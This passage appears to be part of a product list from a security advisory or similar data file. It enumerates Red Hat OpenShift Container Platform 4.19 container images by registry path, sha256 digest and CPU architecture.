"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/container-networking-plugins-microshift-rhel9@sha256:0b1b706bc5a0188d40950a1fdd30f8c410e68dd568ed7d07c1f09443fbde28f4_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/container-networking-plugins-microshift-rhel9@sha256:173800cfc487973c018e8d9badb7d60d26509bbe0803e9a56fba1d5a65070dc0_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/container-networking-plugins-microshift-rhel9@sha256:78a2368225915aca2a514c5d82ba82fff8e70e6123c08905c46839a821f4c8ab_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/container-networking-plugins-microshift-rhel9@sha256:e44aa77638b86f0ade3d4b69e150e8e9e95573ec90b6031224b87e404b5d6a79_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/driver-toolkit-rhel9@sha256:313b7b7e1f619f5fd121ca2402d9db6876d021be227b496288809f63f1209561_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/driver-toolkit-rhel9@sha256:5b232dcf5a47400d1b1d105895df8143b50dc74613b1463b275d6d304e0e0085_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/driver-toolkit-rhel9@sha256:774dcaecbaa4f7b743b49c34a6a9889a27c6379110672a2f28fb4f83cb0f0fe6_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/driver-toolkit-rhel9@sha256:8d55cc650683e44676413797328fff9b3563eb78a1aae4cabe736b20e9f15ff4_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/egress-router-cni-rhel9@sha256:13cd27f7e445af565cef18a24ceca435b4ce2a0c99876b9ad087fdf50e343be6_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/egress-router-cni-rhel9@sha256:5eee15ae4f809e708dbba035fdf60bd2c331462bc6256df74f9124fac03be62b_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/egress-router-cni-rhel9@sha256:af94257f6dd0307527211d5ab2b77ff971d5432a003d4f8e2f1e884cf6ee5215_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/egress-router-cni-rhel9@sha256:cba1849a3d647457c561e01daf7eda74d775430a8b95458684620c0ebb3f47d2_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/frr-rhel9@sha256:1b9bd17c112e00f11fca3cfaea5908d0cd370598beb6909a3c00f58ca6774bee_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/frr-rhel9@sha256:2c646a3a35e8a4503f378096f6045fdb816fa9d5728cc14759748b7265aa47dc_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/frr-rhel9@sha256:47fd82ed75709dd28b0f9f2eab2a051e3bedac64d2fa11dc93a8a8a7159e287b_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/frr-rhel9@sha256:e95f8dd80a31504ccf2ff1ea37026370e41edd179151f1c7c2901e5ed12c1296_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/insights-runtime-exporter-rhel9@sha256:65c161d7215a460b2295a2b4eb82e8bd7e2079e145596185f83d84c4676f1eed_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/insights-runtime-exporter-rhel9@sha256:8f7e2a8735cb9b09639c5a467b8656bd7dd1bd4f72bc50164f0e4623ffacd93c_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/insights-runtime-exporter-rhel9@sha256:a045bd36d61b9586134423526ec66f4aa18c140958a01da59ffaa4003c229e4e_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/insights-runtime-exporter-rhel9@sha256:d426bb25b78392f8093739e457ab75adf9366406e09ef18f8c75d8998a24731e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/insights-runtime-extractor-rhel9@sha256:17333d63845becea642ecb6fd8f76e7a4d698f8a661a981b59e9c920d1973d46_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/insights-runtime-extractor-rhel9@sha256:5c73127d0656e37837d8dba2e4770da5bc26885daf37a4d708a04399410d85a2_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/insights-runtime-extractor-rhel9@sha256:ee3b7a97fb8e0f135e89f28c4f3ad31463a17003c92b979b4f16c262d8d69737_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/insights-runtime-extractor-rhel9@sha256:f59805de5ca2dde13a899b2058e1178288c80e4589515b08b89a6341f64fceb2_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/kube-metrics-server-rhel9@sha256:4892cd8581f10f3338980a4bc69f02d8379e54fc0f4c4d11af27baec253ea11a_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/kube-metrics-server-rhel9@sha256:92295081a775d918e0963d2aff01bb21fc1200ca06faf7a882c652ebeee8c8f0_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/kube-metrics-server-rhel9@sha256:a832bdd818c5c9aa386c7b8fc068c7e41454bd3ae5851e4a805e17c0a22485d5_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/kube-metrics-server-rhel9@sha256:f3f2d167037e26af9b863e6561d2d64bcccdabfc3a6efa7f1085389ece519661_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/kubevirt-csi-driver-rhel9@sha256:01d975619247a08e37e5d9fb38dcbca09555b283991441a4a208da524e4f8c74_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/kubevirt-csi-driver-rhel9@sha256:04db41f215a8d65a168c117ad8cdbf0d0ca3dc4baaa5acede9e29beac647ce0e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/kubevirt-csi-driver-rhel9@sha256:67d767e895fb0299033848441253b41588136a70e31763386c973672c26be496_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/kubevirt-csi-driver-rhel9@sha256:be919e58f27fa8f244683d2b42e4aa2ab467dc93fe7c3c3c3b6032f3555627f8_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/network-tools-rhel9@sha256:083bb81614554fab84226913ccd021b11f7ef126606dbd10cabd727a501551e4_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/network-tools-rhel9@sha256:1aa42ec77b3d3339df819904aa14a43382739617e532b5d0002a5e4ebc74736b_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/network-tools-rhel9@sha256:83ef5cae2611a335710b324338a1f26d7e90a7918b4fe642e05e447e65d46b7d_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/network-tools-rhel9@sha256:fa1d216867be999b74ea9e61644fe42315952afce3b6efce25308960adf393eb_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/oc-mirror-plugin-rhel9@sha256:15832adc4ad8716113e5cb0aa6af6ab43aa6c4608e8909fe31041e46fce6ab42_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/oc-mirror-plugin-rhel9@sha256:596dad4fcad33b13f2db099ba3ac4aefa3e7ccde280a75b658df139227b63732_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/oc-mirror-plugin-rhel9@sha256:849b3cc7fe43ab6480fcd974e7796f5b8aa1e610add35558635b3c8afc602975_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/oc-mirror-plugin-rhel9@sha256:a35e6d40471cdcec9fa54afc1da4c2ddb4ff2739b65bc67ddbff655aaf45a09f_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/openshift-route-controller-manager-rhel9@sha256:6c6b2ab932649b97579c8a76f57d9c8f0c8b2dededcd0843563d7bb85d116b8b_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/openshift-route-controller-manager-rhel9@sha256:ab8f35a5cc7907c3114427a3f46489cf2cc54650caa9d15b1654fff6f0e43dc3_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/openshift-route-controller-manager-rhel9@sha256:ceedbad08f41cb0095006089b0595524a1ffa3c035f39e59d5ebbd5be07fcdce_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/openshift-route-controller-manager-rhel9@sha256:fc090f33468f64fdd024263813034bd889ec44c61587ee9c1ecb8abdb9921da0_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/openstack-resource-controller-rhel9@sha256:23369a9840fe178321aa47458d1fea488bf37545f4a335d39ba4cc0711019c3e_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/openstack-resource-controller-rhel9@sha256:784f4206de4bb479ae43476c483face9ba3b209188b3a0201f66580b944fca02_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/openstack-resource-controller-rhel9@sha256:87546cc6262c2c6eadb54266c42ccc03c3e2ad7c3c809ee21529f0bfb4707105_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/openstack-resource-controller-rhel9@sha256:ed079597ea5b2fe6bf4d4b7efa09f6cb76691362c62a268accb0d5bb5fd7daed_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-api-server-rhel9@sha256:2845efdf030408d0d545862b74020ec95c2e2f4c0fbcd6d5834002fd1f224b9a_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-api-server-rhel9@sha256:ae56b7456515539ec14105e5a8221b83dc53c1a5571a6e46e0c3b0632f98096c_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-api-server-rhel9@sha256:b3351e1878d5ef1111ce4b2eca74bad875b8773b11b8597f83c11a7f7b226da7_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-api-server-rhel9@sha256:b72fc45f6e78468f442c5bf487721227053eb0d49ef3eea5be6cef181007e290_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-csr-approver-rhel9@sha256:12309e06f58c6b122ebc7ef2958ec0a0526edd9ea21b888866dcc2f753a7cf2d_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-csr-approver-rhel9@sha256:5727ab378cdf09a1eb20b6120da5ee6d66a1473ea0d7dfd0709faf5c53df615f_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-csr-approver-rhel9@sha256:d85ca66233c95a4b622d97b50ae304dab7cd3ea67efbc40ab9ddb723478104b7_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-csr-approver-rhel9@sha256:f26b039b69b5d006e04148dd4e7d6bcada2ae22c8892e094e43c6bb307a99cea_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-node-agent-rhel9@sha256:1f2b394a49751e0cbc81a776a8abefaee56aea8a2449a56f66ec4fb8bd7b36a0_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-node-agent-rhel9@sha256:5a3bb13d5a7dfd660ce6ca1799af07ff0eb73148a51b3e5864fda09650186530_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-node-agent-rhel9@sha256:a676ed9f3d05a12ca0965f8b33d002d95cc8578f5a74f0bcf984594d784b0e3c_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-node-agent-rhel9@sha256:dbd96ce5c1082dd3f2de07bd34f805d64952bee798cd96f2d9f94d195acbfd2e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-orchestrator-rhel9@sha256:0104fa2a05916db8ce121350b3e026a74891560be71999451943090f63d727a2_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-orchestrator-rhel9@sha256:590caaaf15b7a11ce69df24820ddc1f4b0b7a1c7cc5d2e62e2c3bfd35a5bb733_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-orchestrator-rhel9@sha256:69d052085b27f034e581680b283ed51134f2d8d5c895f0b2984946c158304249_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-orchestrator-rhel9@sha256:69f33223ac1b30068c884ba58ef4f04545ed5d02dab43dd525ff3f66c299885f_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-utils-rhel9@sha256:0beec3d7cd2663215fbfd97490b8aa1a684580e273dd9161d574f3ce5fe936b5_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-utils-rhel9@sha256:19636219d56bc03c8641e266ed3d82cae94bd7431e3da0c48ccba9bfb541ef6f_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-utils-rhel9@sha256:2ad51487bd9dd02bdabe506d2c5758a9e9df2903a8a63d1a19d720281390eebc_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-utils-rhel9@sha256:7c081487e39de209265d2bb960fb68fa2997e1620f37bdd3bb1aac57483bbbe7_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-apiserver-network-proxy-rhel9@sha256:13560a7a1ab60ebe5a593c4c6819d730f1e8fad5031a5a38b7aa8ebcb52776b9_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-apiserver-network-proxy-rhel9@sha256:4f90910be0a33320bf234e3c25b6c364a0e730d76be53fc8c7e50227c14e25e2_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-apiserver-network-proxy-rhel9@sha256:7406a10e78b85749cd597d3ced8b69a87a7931119611e996dd8cd660ff1ac47c_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-apiserver-network-proxy-rhel9@sha256:d710074f9ebfa1ec4e15c5ee4718b748259f8907f4ec0aa56045c00cf19a691c_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-aws-cloud-controller-manager-rhel9@sha256:6bf2ac59bb7ee40409082d564bde5d5568be09bd21219fe0c62ebc6624912b1a_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-aws-cloud-controller-manager-rhel9@sha256:8ad00ec95b55f781061f47a2b0b7b2ae6e557bb9cdbad826c097fde6a5b7d791_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-aws-cluster-api-controllers-rhel9@sha256:3dc93509b8cad942ffeea32ba1c75db4b94a66a8c1a6d7b29f13ed6ec83e5f9b_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-aws-cluster-api-controllers-rhel9@sha256:ae91dc01aca5115ba88290f86ab266ad69b86c68c83097adafb82defdfc5c524_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-aws-ebs-csi-driver-rhel9-operator@sha256:67f9c3e3f77df4be9e4925fe7c5fb4cb95d770395bbb1b32847c7100d8f9e8fe_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-aws-ebs-csi-driver-rhel9-operator@sha256:ef09a660c5bd1b44464ed961ade4f9ceef47dfe1005efde15de94631dadebf4f_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-aws-ebs-csi-driver-rhel9@sha256:d1a5ebdd8e8fcd15749e48a18cf340a309c6c219c8adf85d2df1caa773784d86_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-aws-ebs-csi-driver-rhel9@sha256:de7f8ba8b4ed81e733af2d6b40e2dbb97c7afdc627973bfb838bd69ed9183eba_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-aws-pod-identity-webhook-rhel9@sha256:15b866541c161693e74ad7106aec45b9713f81e1f3e2f10deb0822b58fbb884e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-aws-pod-identity-webhook-rhel9@sha256:240132f7cf6ec28b4f711323b5c9f10ba76e85ba0ed2e66c663096089fdcc128_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-cloud-controller-manager-rhel9@sha256:2191714083728cc0984775c5b8c3ee972723c1378058f0923ab60036345d9825_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-cloud-controller-manager-rhel9@sha256:249b48b699ef21517d11a3533293184b1524b5907fec00593a98f0581363dc12_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-cloud-node-manager-rhel9@sha256:660ad818c22efdd4fb965ded889c7ed08b331cb8d50c145bd4a34e74158f790a_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-cloud-node-manager-rhel9@sha256:deb01110f819b3534a2bd24b5406c69bcf5011eaebdeec438a31f1cd68f18029_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-cluster-api-controllers-rhel9@sha256:255b3979a3a054696f21f437998c892b5738cbbcdc021b0a22752f1d9bb48712_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-cluster-api-controllers-rhel9@sha256:d665a06a23572a2bcf3345f9c22b2b9895292e1f43d5532b793a3ea4df0c42c8_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-disk-csi-driver-rhel9-operator@sha256:086285dd82aadc71803c847a06a2e0727b4fbb09f07a5bf95979ebc50bb95e82_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-disk-csi-driver-rhel9-operator@sha256:0f5c719b22dbba95b6d61db0c63ba8107689a7d61f6944e0d2dc5fa3e693d25e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-disk-csi-driver-rhel9@sha256:1452416d5cfd9acae6f0bf60da783ec8cf632784655f4602462cf380cd7fe518_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-disk-csi-driver-rhel9@sha256:b13a67c30437a6950f41cdda853305d03ac24809746bdca955782db1c59824b1_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-file-csi-driver-operator-rhel9@sha256:43f58c25df6d439ab60c6a7fd905db92d67678bf55732103069b9d3ce9a6ee1d_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-file-csi-driver-operator-rhel9@sha256:5eca83117e60a69246033c3cedcc2e2962e0f0a6ae6d6d7e3c35546cdc78ce70_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-file-csi-driver-rhel9@sha256:daddd3f94f513bfce03ea0c5aa406164838aa7bc41c3251b02686fd86da09d7a_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-file-csi-driver-rhel9@sha256:f1a3870617f3e6c0774b5484820351c404cabe3161684c6edf3b81554cf9f1de_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-workload-identity-webhook-rhel9@sha256:4f54884bb854edec3a1a28ba089ddc068edc3ad0677637dd9b033a1c0ff8052c_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-workload-identity-webhook-rhel9@sha256:834a2b63a74d7af617155da8f25a36f196b7c16a78154468b1cb88a10fdfa88d_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-cluster-api-controllers-rhel9@sha256:3f79fe8b748ce5015d5d71ce8da20bbff7241868e87066d1d50083a3ceb91bfe_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-cluster-api-controllers-rhel9@sha256:66745a12cf917414d197c589e7e57a62958da4c66d5372e848e40568d8ddfafc_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-cluster-api-controllers-rhel9@sha256:900e5ff2f8ea86f0864c6a3cd1707a620427189f5bfffa0bb0ea9a8c0ed85330_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-cluster-api-controllers-rhel9@sha256:c029ff100811f13c0ba79c03044e0c6f096567511c336e4d1ecced6e900c2acd_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-installer-rhel9@sha256:37fe6420e98e7d1927492a7a40fd01578cfaf441530b7bf2f85cc7d593d7b097_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-installer-rhel9@sha256:480d7e114879e0c9bcfd62250af7f2f7b4a25e7d4cca65d97c422349fe164334_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-installer-rhel9@sha256:6f49794879ad8a54b4a9ba77661ebdf84cb90a048d1472c1f878c10a9ecc46e6_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-installer-rhel9@sha256:77c778debce0cb2eff5f5e66a3db3e30905e0138de3ddc3cd5330d2a79ec2cf9_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-machine-controllers-rhel9@sha256:6aef6b3ea8ceb252107d24252c9c155e21d42825343e2a824d869f897a86da4f_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-machine-controllers-rhel9@sha256:895cb0d9b4715a75c1ffa4539bbd86c14f774e664ab16f5df4bc3e55ef537225_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-machine-controllers-rhel9@sha256:99fc0e641a6014bad4027471174578ba22c0a4a99c05b6bca1e8c838bbda0a90_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-machine-controllers-rhel9@sha256:aee32f17c4c4aa3deaca4a1884efc7c1a05d4fdadea145b247c4364e9e82086a_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-rhel9-operator@sha256:07f2b6c01f22078c6b6eea7916982ebfcf6f992daf0d80af7b18972e6c484868_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-rhel9-operator@sha256:3efbeb0ba231cc16b69a86c43c28aa02b7e773413b361ceaf82c72cb215dc187_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-rhel9-operator@sha256:a212996fe27771f82406dc36d68e07e29ecf975834c3cde6395b35cd259edbe9_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-rhel9-operator@sha256:b7f1f48335150e9e3ff89c0c349345f2c7fb6d7cf27793d263cca791d53f260c_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-runtimecfg-rhel9@sha256:39852b09d2ff95f03cff6f39398c67d30d64366f00a0ca73319d81831b7f6e23_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-runtimecfg-rhel9@sha256:6d2dbe2a871324b770da093074a9fcac3aa590896e366354f8202bf80eae70ed_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-runtimecfg-rhel9@sha256:9df2c55943c62172a5ab42fcd2309a232a8e455240efeba614e2e70308972764_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-runtimecfg-rhel9@sha256:e6aaec6333f15e8aa67ad391f57eb7225007c068947982d18fea6b90d837e6e2_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cli-artifacts-rhel9@sha256:02c4fe2761b586f29c78d9419f0b90d98bee92b8d4fa47ec77dfe45795fab7fb_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cli-artifacts-rhel9@sha256:4b1a4e3c67e3fc5c14a8cb7130eec3ea191f27473942f7afb09b497a30236947_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cli-artifacts-rhel9@sha256:a9e099fe57f31d4e86d0edbad9605aae421fbe410d1b7c2f6e7036940ba5e319_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cli-artifacts-rhel9@sha256:e3504f1bb6b8b89f4f01ecefc3c8646cbc949d638bfa6db0638476731d9f0e96_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cli-rhel9@sha256:1cdfe759fe6d9b1745276957b712c1a46a69ce1c59706a7ba9ca8f3f89cc844d_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cli-rhel9@sha256:2fafd2b4c0fb8500c0180c767e55f70d26203e68500e64d252fe3a10227a161a_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cli-rhel9@sha256:5a96f6965efd6579efde9b1a1b4ae88b57cbb49f38cf2a39ef90a55470a30667_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cli-rhel9@sha256:95c126293ef394a5ce8882e8cfa9c6f6c22e9cae79e64e07f0e1e57a8fb55211_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cloud-credential-rhel9-operator@sha256:4e885357cb52fffbb832d31d97400cfc629f26d5c38b4692379d08ba485f46d2_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cloud-credential-rhel9-operator@sha256:645168f7cb91679d374bc1e431181a1b964dec279265ec52e5809b368e08654c_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cloud-credential-rhel9-operator@sha256:7c20e19cdbb62a268ffea39d5e0004fb4e6b587c41250c73180043f56b9fe0e5_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cloud-credential-rhel9-operator@sha256:c17396793e30858f900b68ed2981f38062d501b7600a5e4ca127d4e14113aca4_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-api-rhel9@sha256:56453e8ce0dbb39d0259d2f0b36f58d8f049bf6c1a880b8a1eaa37d8ade32067_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-api-rhel9@sha256:6513461d1b413d648dc1d2327fac029633f5d34322459f2752d1096648fa37b4_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-api-rhel9@sha256:9a083427c52dcc2f9716408cf23991613eef7c41fb6eb1ee4841491276971039_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-api-rhel9@sha256:dcfe6ab706950430187a24e9792b6f0c270f813841e799ea7e35623679269ae5_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-authentication-rhel9-operator@sha256:334e975b0d8a94ec45ade469bf86809c9a07e9456cda5d5c71d6f91a2877faa0_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-authentication-rhel9-operator@sha256:64dfc7beaf3a8cfdab85ba963db74971ca68b6cf614aa04279f4af3239806e4c_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-authentication-rhel9-operator@sha256:7b99d625b14ced1fd44520bd106906dd60f84e7794257fe3b4d3a3aa685ebbbc_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-authentication-rhel9-operator@sha256:8b854d27a269e0f6b6d542f652c504ab0678ac18d1b84db63078257eebe090cf_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9-operator@sha256:2601add0c23c9e27079274736508adab64c6ae4128f66a53df3f569fe2d9fe3f_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9-operator@sha256:6917cb0e3b073a13ec29e5c329f01cf2ec26e78d47c3c8360d0063d186a4ba53_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9-operator@sha256:a400d84e7f46869a2c2f75b6f221684879b680910b5e5e4662e074a020483cf4_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9-operator@sha256:d94b765497d2fa316fbf4ec374572a5fba96a99b78dfe02b6ed6986e2b7782e6_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9@sha256:26b8049bd1a84ed402fad985ca842bf91ba86fbc5e46f7dea0050120ca551643_ppc64le",
